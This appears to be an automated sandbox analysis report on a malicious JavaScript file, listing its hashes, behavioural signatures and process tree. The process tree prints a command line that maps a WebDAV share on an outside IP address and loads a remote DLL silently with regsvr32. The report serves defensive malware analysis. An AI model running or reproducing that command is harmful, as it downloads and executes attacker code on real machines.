Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
b3de0b2ad947d5b6d324f687d7c2ee1109baa94bf17cec54553575a91728eb60.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
b3de0b2ad947d5b6d324f687d7c2ee1109baa94bf17cec54553575a91728eb60.js
Resource
win10v2004-20240709-en
General
-
Target
b3de0b2ad947d5b6d324f687d7c2ee1109baa94bf17cec54553575a91728eb60.js
-
Size
5KB
-
MD5
25653b2119f5c6e1a2279bcba9a2ff4f
-
SHA1
ffe44e7d7e4628ed2972306046851ede6ec8926a
-
SHA256
b3de0b2ad947d5b6d324f687d7c2ee1109baa94bf17cec54553575a91728eb60
-
SHA512
54d1af2d13e9dcd031b7d283f87489dea6311e85e13df73561876cac537efcb9a0483de07c488fb9ad13a13d6a9c33fbedcde776e2af74fed1ae447fe5f65ced
-
SSDEEP
96:Bx11vkh4ngV3VG1iqAXuCt6MqJJO24xQxmKGehOWM4NMHPXiakPsdiadXPObPBPf:Bx11vkh4ngV3VG1iqAXuCt6MqJJV4SxD
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4236 wrote to memory of 4852 4236 wscript.exe 84 PID 4236 wrote to memory of 4852 4236 wscript.exe 84 PID 4852 wrote to memory of 4288 4852 cmd.exe 86 PID 4852 wrote to memory of 4288 4852 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b3de0b2ad947d5b6d324f687d7c2ee1109baa94bf17cec54553575a91728eb60.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\747832556940.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4288
-
-